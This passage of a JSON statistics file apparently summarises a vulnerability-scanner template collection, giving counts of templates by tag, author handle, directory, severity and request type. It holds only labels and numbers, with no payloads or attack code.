fka","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"sonarqube","count":2},{"name":"shellshock","count":2},{"name":"fortios","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"openam","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"cve2008","count":2},{"name":"bitrix","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"spark","count":2},{"name":"nexus","count":2},{"name":"openfire","count":2},{"name":"rockethchat","count":2},{"name":"jboss","count":2},{"name":"sharepoint","count":2},{"name":"kibana","count":2},{"name":"nextjs","count":2},{"name":"vrealize","count":2},{"name":"emerge","count":2},{"name":"leak","count":2},{"name":"cache","count":2},{"name":"yapi","count":2},{"name":"sonicwall","count":2},{"name":"prometheus","count":2},{"name":"paloalto","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"kevinlab","count":2},{"name":"xxljob","count":2},{"name":"intrusive","count":2},{"name":"voipmonitor","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"igs","count":2},{"name":"odoo","count":2},{"name":"chiyu","count":2},{"name":"webcam","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"telerik","count":2},{"name":"zhiyuan","count":2},{"name":"zabbix","count":2},{"name":"flir","count":2},{"name":"service","count":2},{"name":"kentico","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"bigip","count":2},{"name":"pega","count":2},{"name":"wordfence","count":2},{"name":"linkerd","count":2},{"name":"ecology","count":2},{"name":"chamilo","count":2},{"name":"idrac","count":2},{"name":"smtp","count":2},{"name":"natshell","count":2},{"name":"hpe","count":2},{"name":"globalprotect","count":2},{"name":"oauth","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"mida","count":2},{"name":"httpd","count":2},{"name":"jellyfin","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"hashicorp","count":2},{"name":"gitlist","count":1},{"name":"jquery","count":1},{"name":"razor","count":1},{"name":"checkpoint","count":1},{"name":"erp-nc","count":1},{"name":"mongo","count":1},{"name":"idemia","count":1},{"name":"shopware","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"bookstack","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"zend","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"klog","count":1},{"name":"varnish","count":1},{"name":"javamelody","count":1},{"name":"2014","count":1},{"name":"oscommerce","count":1},{"name":"discourse","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"avalanche","count":1},{"name":"eprints","count":1},{"name":"acexy","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"lancom","count":1},{"name":"magicflow","count":1},{"name":"cloudflare","count":1},{"name":"wazuh","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"bruteforce","count":1},{"name":"tenda","count":1},{"name":"backdoor","count":1},{"name":"swagger","count":1},{"name":"wifisky","count":1},{"name":"socomec","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"etouch","count":1},{"name":"proftpd","count":1},{"name":"wavemaker","count":1},{"name":"clave","count":1},{"name":"plugin","count":1},{"name":"fortigates","count":1},{"name":"fortinet","count":1},{"name":"tensorflow","count":1},{"name":"szhe","count":1},{"name":"phpunit","count":1},{"name":"acme","count":1},{"name":"phalcon","count":1},{"name":"dvwa","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"fortiweb","count":1},{"name":"panabit","count":1},{"name":"moin","count":1},{"name":"grav","count":1},{"name":"bitly","count":1},{"name":"manageengine","count":1},{"name":"phpfusion","count":1},{"name":"hiboss","count":1},{"name":"mdb","count":1},{"name":"mirai","count":1},{"name":"netdata","count":1},{"name":"liferay","count":1},{"name":"rfi","count":1},{"name":"monitorix","count":1},{"name":"tongda","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"trilithic","count":1},{"name":"scimono","count":1},{"name":"visualtools","count":1},{"name":"drone","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"skywalking","count":1},{"name":"lanproxy","count":1},{"name":"huijietong","count":1},{"name":"jeewms","count":1},{"name":"rhymix","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"k8","count":1},{"name":"jenkin","count":1},{"name":"opensns","count":1},{"name":"nuxeo","count":1},{"name":"nette","count":1},{"name":"nc2","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"ssltls","count":1},{"name":"redwood","count":1},{"name":"nordex","count":1},{"name":"wso2","count":1},{"name":"goahead","count":1},{"name":"doh","count":1},{"name":"lansweeper","count":1},{"name":"harbor","count":1},{"name":"firebase","count":1},{"name":"redhat","count":1},{"name":"wiki","count":1},{"name":"sceditor","count":1},{"name":"sitecore","count":1},{"name":"vsphere","count":1},{"name":"ec2","count":1},{"name":"plone","count":1},{"name":"primetek","count":1},{"name":"wuzhicms","count":1},{"name":"lotuscms","count":1},{"name":"fedora","count":1},{"name":"itop","count":1},{"name":"monitorr","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"circontrol","count":1},{"name":"lutron","count":1},{"name":"bash","count":1},{"name":"st","count":1},{"name":"alibaba","count":1},{"name":"parentlink","count":1},{"name":"diris","count":1},{"name":"totaljs","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"circontrorl","count":1},{"name":"zte","count":1},{"name":"nuuo","count":1},{"name":"postmessage","count":1},{"name":"setup","count":1},{"name":"mautic","count":1},{"name":"zarafa","count":1},{"name":"zmanda","count":1},{"name":"dotnetnuke","count":1},{"name":"beanshell","count":1},{"name":"upload","count":1},{"name":"blue-ocean","count":1},{"name":"plastic","count":1},{"name":"vscode","count":1},{"name":"ruby","count":1},{"name":"fastapi","count":1},{"name":"ulterius","count":1},{"name":"xunchi","count":1},{"name":"sentry","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"jmx","count":1},{"name":"chinaunicom","count":1},{"name":"darkstat","count":1},{"name":"memcached","count":1},{"name":"stem","count":1},{"name":"grails","count":1},{"name":"kafdrop","count":1},{"name":"enum","count":1},{"name":"zimbra","count":1},{"name":"ilo4","count":1},{"name":"rdp","count":1},{"name":"anchorcms","count":1},{"name":"nedi","count":1},{"name":"mara","count":1},{"name":"mantis","count":1},{"name":"sco","count":1},{"name":"faraday","count":1},{"name":"hasura","count":1},{"name":"kerbynet","count":1},{"name":"servicedesk","count":1},{"name":"opentsdb","count":1},{"name":"salesforce","count":1},{"name":"fastcgi","count":1},{"name":"appweb","count":1},{"name":"openerp","count":1},{"name":"woocomernce","count":1},{"name":"octobercms","count":1},{"name":"linkedin","count":1},{"name":"yachtcontrol","count":1},{"name":"zm","count":1},{"name":"tapestry","count":1},{"name":"vnc","count":1},{"name":"node-red-dashboard","count":1},{"name":"mobileiron","count":1},{"name":"ssl","count":1},{"name":"ecom","count":1},{"name":"empirecms","count":1},{"name":"postgres","count":1},{"name":"svnserve","count":1},{"name":"heroku","count":1},{"name":"moinmoin","count":1},{"name":"centos","count":1},{"name":"jitsi","count":1},{"name":"cacti","count":1},{"name":"cse","count":1},{"name":"cocoon","count":1},{"name":"csrf","count":1},{"name":"timesheet","count":1},{"name":"keenetic","count":1},{"name":"xff","count":1},{"name":"flash","count":1},{"name":"gogs","count":1},{"name":"majordomo2","count":1},{"name":"opensmtpd","count":1},{"name":"exchange","count":1},{"name":"opm","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"pgadmin","count":1},{"name":"webui","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"mpsec","count":1},{"name":"exacqvision","count":1},{"name":"sprintful","count":1},{"name":"bullwark","count":1},{"name":"netrc","count":1},{"name":"openrestry","count":1},{"name":"smartsense","count":1},{"name":"flink","count":1},{"name":"metinfo","count":1},{"name":"robomongo","count":1},{"name":"emc","count":1},{"name":"fortigate","count":1},{"name":"cve2005","count":1},{"name":"gridx","count":1},{"name":"synnefo","count":1},{"name":"calendarix","count":1},{"name":"eyou","count":1},{"name":"xdcms","count":1},{"name":"subrion","count":1},{"name":"servicenow","count":1},{"name":"rmi","count":1},{"name":"db","count":1},{"name":"enumeration","count":1},{"name":"powercreator","count":1},{"name":"jenzabar","count":1},{"name":"zzzcms","count":1},{"name":"openstack","count":1},{"name":"ems","count":1},{"name":"wmt","count":1},{"name":"chevereto","count":1},{"name":"74cms","count":1},{"name":"mailchimp","count":1},{"name":"webadmin","count":1},{"name":"glances","count":1},{"name":"cgi","count":1},{"name":"episerver","count":1},{"name":"dompdf","count":1},{"name":"rsyncd","count":1},{"name":"shopxo","count":1},{"name":"aspnuke","count":1},{"name":"viewpoint","count":1},{"name":"mariadb","count":1},{"name":"wavlink","count":1},{"name":"javafaces","count":1},{"name":"webmodule-ee","count":1},{"name":"hortonworks","count":1},{"name":"kubeflow","count":1},{"name":"sqlite","count":1},{"name":"cors","count":1},{"name":"geutebruck","count":1},{"name":"labtech","count":1},{"name":"apiman","count":1},{"name":"nps","count":1},{"name":"jnoj","count":1},{"name":"azure","count":1},{"name":"fortilogger","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"seacms","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"finereport","count":1},{"name":"viewlinc","count":1},{"name":"haproxy","count":1},{"name":"spring","count":1},{"name":"npm","count":1},{"name":"xml","count":1},{"name":"wamp","count":1},{"name":"spectracom","count":1},{"name":"ricoh","count":1},{"name":"pacsone","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"concrete","count":1},{"name":"landray","count":1},{"name":"accela","count":1},{"name":"mediumish","count":1},{"name":"alerta","count":1},{"name":"k8s","count":1},{"name":"avtech","count":1},{"name":"akamai","count":1},{"name":"weiphp","count":1},{"name":"ntopng","count":1},{"name":"wp-theme","count":1},{"name":"turbocrm","count":1},{"name":"netis","count":1},{"name":"expressjs","count":1},{"name":"kyan","count":1},{"name":" default-login","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"dlogin","count":1},{"name":"ns","count":1},{"name":"esmtp","count":1},{"name":"tika","count":1},{"name":"uwsgi","count":1},{"name":"sarg","count":1},{"name":"glpi","count":1},{"name":"rmc","count":1},{"name":"kong","count":1},{"name":"favicon","count":1},{"name":"fiori","count":1},{"name":"cloudinary","count":1},{"name":"blackboard","count":1},{"name":"symfony","count":1},{"name":"panos","count":1},{"name":"landrayoa","count":1},{"name":"druid","count":1},{"name":"gateone","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"floc","count":1},{"name":"feifeicms","count":1},{"name":"arl","count":1},{"name":"lighttpd","count":1},{"name":"portainer","count":1},{"name":"hadoop","count":1},{"name":"maccmsv10","count":1},{"name":"wooyun","count":1},{"name":"solman","count":1},{"name":"horde","count":1},{"name":"sidekiq","count":1},{"name":"krweb","count":1},{"name":"htmli","count":1},{"name":"myucms","count":1},{"name":"h3c-imc","count":1},{"name":"tileserver","count":1},{"name":"email","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"ueditor","count":1},{"name":"bedita","count":1},{"name":"traefik","count":1},{"name":"mcafee","count":1},{"name":"commscope","count":1},{"name":"geddy","count":1},{"name":"realteo","count":1},{"name":"addpac","count":1},{"name":"jfrog","count":1},{"name":"node","count":1},{"name":"biometrics","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"emby","count":1},{"name":"ioncube","count":1},{"name":"axis","count":1},{"name":"visionhub","count":1},{"name":"saltapi","count":1},{"name":"rabbitmq","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"yii","count":1},{"name":"clusterengine","count":1},{"name":"status","count":1},{"name":"spf","count":1},{"name":"zcms","count":1},{"name":"jsf","count":1},{"name":"opencast","count":1},{"name":"zookeeper","count":1},{"name":"dom","count":1},{"name":"discord","count":1},{"name":"codemeter","count":1},{"name":"embedthis","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"phpinfo","count":1},{"name":"rujjie","count":1},{"name":"apos","count":1},{"name":"dvr","count":1},{"name":"xiuno","count":1},{"name":"nomad","count":1},{"name":"springframework","count":1},{"name":"ambari","count":1},{"name":"pyramid","count":1},{"name":"zeroshell","count":1},{"name":"clockwatch","count":1},{"name":"scs","count":1},{"name":"b2evolution","count":1},{"name":"netsweeper","count":1},{"name":"webmin","count":1},{"name":"cobub","count":1},{"name":"adminer","count":1},{"name":"jsp","count":1},{"name":"upnp","count":1},{"name":"tamronos","count":1},{"name":"javascript","count":1},{"name":"mantisbt","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"melbadry9","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bp0lr","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"shifacyclewala","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"unstabl3","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"ree4pwn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"randomrobbie","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"gevakun","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"bing0o","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"becivells","count":1},{"name":"luci","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"b0yd","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"smaranchand","count":1},{"name":"juicypotato1","count":1},{"name":"willd96","count":1},{"name":"alifathi-h1","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"bolli95","count":1},{"name":"dogasantos","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"andysvints","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"@dwisiswant0","count":1},{"name":"naglinagli","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"deena","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"luskabol","count":1},{"name":"divya_mudgal","count":1},{"name":"undefl0w","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"0ut0fb4nd","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"0xrod","count":1},{"name":"rodnt","count":1},{"name":"co0nan","count":1},{"name":"sy3omda","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"jteles","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"un-fmunozs","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"whynotke","count":1},{"name":"0h1in9e","count":1},{"name":"mohammedsaneem","count":1},{"name":"flag007","count":1},{"name":"r3naissance","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"raesene","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"yashgoti","count":1},{"name":"gal nagli","count":1},{"name":"kabirsuda","count":1},{"name":"vzamanillo","count":1},{"name":"makyotox","count":1},{"name":"andirrahmani1","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"pudsec","count":1},{"name":"patralos","count":1},{"name":"qlkwej","count":1},{"name":"zandros0","count":1},{"name":"aresx","count":1},{"name":"vsh00t","count":1},{"name":"blckraven","count":1},{"name":"arcc","count":1},{"name":"rojanrijal","count":1},{"name":"taielab","count":1},{"name":"shifacyclewla","count":1},{"name":"affix","count":1},{"name":"kurohost","count":1},{"name":"furkansenan","count":1},{"name":"fopina","count":1},{"name":"ooooooo_q","count":1},{"name":"ipanda","count":1},{"name":"52971","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"notsoevilweasel","count":1},{"name":"schniggie","count":1},{"name":"johnjhacking","count":1},{"name":"berkdusunur","count":1},{"name":"daviey","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"akshansh","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"ringo","count":1},{"name":"kareemse1im","count":1},{"name":"ohlinge","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"iampritam","count":1},{"name":"toufik airane","count":1},{"name":"thevillagehacker","count":1},{"name":"idealphase","count":1},{"name":"defr0ggy","count":1},{"name":"ajaysenr","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"yavolo","count":1},{"name":"rtcms","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"its0x08","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"retr0","count":1},{"name":"exploitation","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"b4uh0lz","count":1},{"name":"sullo","count":1},{"name":"bernardofsr","count":1},{"name":"shreyapohekar","count":1},{"name":"apt-mirror","count":1},{"name":"ldionmarcil","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"bad5ect0r","count":1},{"name":"wabafet","count":1},{"name":"absshax","count":1},{"name":"c3l3si4n","count":1},{"name":"sshell","count":1}],"directory":[{"name":"cves","count":518},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":22},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":512},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":174},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":84},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"","count":66},{"name":"cve2018","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":33},{"name":"oracle","count":29},{"name":"workflow","count":29},{"name":"logs","count":29},{"name":"misc","count":27},{"name":"ssrf","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"cve2015","count":13},{"name":"fuzz","count":13},{"name":"struts","count":13},{"name":"misconfig","count":13},{"name":"auth-bypass","count":12},{"name":"adobe","count":12},{"name":"android","count":12},{"name":"weblogic","count":12},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"jenkins","count":10},{"name":"cve2013","count":10},{"name":"dlink","count":10},{"name":"devops","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"cnvd","count":8},{"name":"router","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"ftp","count":8},{"name":"xxe","count":7},{"name":"nginx","count":7},{"name":"vmware","count":7},{"name":"scada","count":7},{"name":"joomla","count":7},{"name":"citrix","count":6},{"name":"coldfusion","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"google","count":6},{"name":"backup","count":6},{"name":"jetty","count":6},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"iis","count":5},{"name":"cve2009","count":5},{"name":"ssti","count":5},{"name":"dedecms","count":5},{"name":"dell","count":5},{"name":"lucee","count":5},{"name":"files","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"confluence","count":5},{"name":"phpmyadmin","count":5},{"name":"login","count":5},{"name":"java","count":5},{"name":"netgear","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"laravel","count":5},{"name":"ruijie","count":5},{"name":"artifactory","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"magmi","count":4},{"name":"tomcat","count":4},{"name":"hongdian","count":4},{"name":"vpn","count":4},{"name":"moodle","count":4},{"name":"fileupload","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"elastic","count":4},{"name":"nodejs","count":4},{"name":"thinkphp","count":4},{"name":"webserver","count":4},{"name":"solarwinds","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"mongodb","count":3},{"name":"fanruan","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"kafka","count":3},{"name":"ofbiz","count":3},{"name":"vbulletin","count":3},{"name":"hp","count":3},{"name":"printer","count":3},{"name":"microstrategy","count":3},{"name":"terramaster","count":3},{"name":"r-seenet","count":3},{"name":"git","count":3},{"name":"amazon","count":3},{"name":"resin","count":3},{"name":"ebs","count":3},{"name":"windows","count":3},{"name":"oa","count":3},{"name":"grafana","count":3},{"name":"kubernetes","count":3},{"name":"bypass","count":3},{"name":"deserialization","count":3},{"name":"backups","count":3},{"name":"nacos","count":3},{"name":"openssh","count":3},{"name":"log","count":3},{"name":"cve2010","count":3},{"name":"nosqli","count":3},{"name":"slack","count":3},{"name":"springcloud","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"kevinlab","count":2},{"name":"spark","count":2},{"name":"splunk","count":2},{"name":"telerik","count":2},{"name":"plesk","count":2},{"name":"sharepoint","count":2},{"name":"bitrix","count":2},{"name":"kibana","count":2},{"name":"couchdb","count":2},{"name":"seeyon","count":2},{"name":"hashicorp","count":2},{"name":"nextjs","count":2},{"name":"cve2007","count":2},{"name":"sonicwall","count":2},{"name":"linkerd","count":2},{"name":"openfire","count":2},{"name":"shellshock","count":2},{"name":"chiyu","count":2},{"name":"globalprotect","count":2},{"name":"frp","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"ucmdb","count":2},{"name":"wordfence","count":2},{"name":"dos","count":2},{"name":"paloalto","count":2},{"name":"openam","count":2},{"name":"zhiyuan","count":2},{"name":"nexus","count":2},{"name":"rockmongo","count":2},{"name":"mida","count":2},{"name":"sonarqube","count":2},{"name":"strapi","count":2},{"name":"cache","count":2},{"name":"saltstack","count":2},{"name":"rockethchat","count":2},{"name":"xxljob","count":2},{"name":"leak","count":2},{"name":"bigip","count":2},{"name":"vrealize","count":2},{"name":"waf","count":2},{"name":"huawei","count":2},{"name":"jellyfin","count":2},{"name":"glassfish","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"rstudio","count":2},{"name":"smb","count":2},{"name":"natshell","count":2},{"name":"odoo","count":2},{"name":"jboss","count":2},{"name":"chamilo","count":2},{"name":"kentico","count":2},{"name":"prometheus","count":2},{"name":"idrac","count":2},{"name":"proxy","count":2},{"name":"activemq","count":2},{"name":"microsoft","count":2},{"name":"ecology","count":2},{"name":"voipmonitor","count":2},{"name":"cve2008","count":2},{"name":"fortios","count":2},{"name":"mail","count":2},{"name":"hpe","count":2},{"name":"injection","count":2},{"name":"igs","count":2},{"name":"webcam","count":2},{"name":"flir","count":2},{"name":"zabbix","count":2},{"name":"pega","count":2},{"name":"smtp","count":2},{"name":"service","count":2},{"name":"hjtcloud","count":2},{"name":"trixbox","count":2},{"name":"httpd","count":2},{"name":"yapi","count":2},{"name":"intrusive","count":2},{"name":"maian","count":2},{"name":"nagios","count":2},{"name":"keycloak","count":2},{"name":"checkpoint","count":1},{"name":"mediumish","count":1},{"name":"solman","count":1},{"name":"yii","count":1},{"name":"codeigniter","count":1},{"name":"jnoj","count":1},{"name":"dotclear","count":1},{"name":"pippoint","count":1},{"name":"fuelcms","count":1},{"name":"postmessage","count":1},{"name":"wiki","count":1},{"name":"redcap","count":1},{"name":"emby","count":1},{"name":"clave","count":1},{"name":"idemia","count":1},{"name":"druid","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"dotnetnuke","count":1},{"name":"wildfly","count":1},{"name":"floc","count":1},{"name":"postgres","count":1},{"name":"jeewms","count":1},{"name":"flash","count":1},{"name":"monitorr","count":1},{"name":"socomec","count":1},{"name":"favicon","count":1},{"name":"hasura","count":1},{"name":"metinfo","count":1},{"name":"csod","count":1},{"name":"heroku","count":1},{"name":"discourse","count":1},{"name":"nuxeo","count":1},{"name":"totaljs","count":1},{"name":"redis","count":1},{"name":"ambari","count":1},{"name":"exchange","count":1},{"name":"wamp","count":1},{"name":"akkadian","count":1},{"name":"viewpoint","count":1},{"name":"sidekiq","count":1},{"name":"cloudflare","count":1},{"name":"avtech","count":1},{"name":"fiori","count":1},{"name":"visualtools","count":1},{"name":"linksys","count":1},{"name":"cobub","count":1},{"name":"spring","count":1},{"name":"majordomo2","count":1},{"name":"phpfusion","count":1},{"name":"zzzcms","count":1},{"name":"bruteforce","count":1},{"name":"svnserve","count":1},{"name":"panabit","count":1},{"name":"bullwark","count":1},{"name":"geutebruck","count":1},{"name":"concrete","count":1},{"name":"wp-theme","count":1},{"name":"backdoor","count":1},{"name":"viewlinc","count":1},{"name":"mautic","count":1},{"name":"ruckus","count":1},{"name":"rujjie","count":1},{"name":"kong","count":1},{"name":"tileserver","count":1},{"name":"webftp","count":1},{"name":"erp-